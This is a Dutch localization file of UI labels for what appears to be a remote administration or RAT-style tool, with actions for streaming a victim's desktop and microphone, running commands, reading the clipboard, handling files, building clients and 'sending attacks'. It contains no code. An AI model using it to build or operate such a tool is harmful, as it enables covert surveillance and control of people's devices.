debug.question=Server of client
debug.server=Server
debug.client=Client

server.port_question=Welke poort zou de server zich aan moeten binden?
server.port_error=Invaliede poort
server.free_warning=De client zal pas bruikbaar zijn na het toestel herstart.\r\n\
Doorgaan?
server.free_yes=Ja
server.free_no=Aborteer

builder.address_question=Welk adres zou de client aan moete verbinden?
builder.port_question=Welke poort?
builder.error=Er is iets fout gegaan.

action.popup=Open popup
action.screenshot=Neem screenshot
action.desktop=Toggle desktop stream
action.voice=Toggle microfoon stream
action.files=Doorzoek bestanden
action.command=Executeer commando
action.clipboard=Toon klipbord
action.website=Open website
action.audio=Speel audio
action.free=Bevrijd client
action.build=Client bouwer
action.attack=Stuur aanval
action.request_files=Verzoek inhoud
action.download=Download bestand
action.upload=Upload bestand hier
action.execute=Executeer bestand
action.delete=Verwijder bestand
action.new_directory=Maak nieuwe directory

column.name=Naam
column.location=Locatie
column.address=IP adress
column.os=Besturingssysteem
column.version=Versie
column.desktop=Streaming desktop
column.voice=Streaming microfoon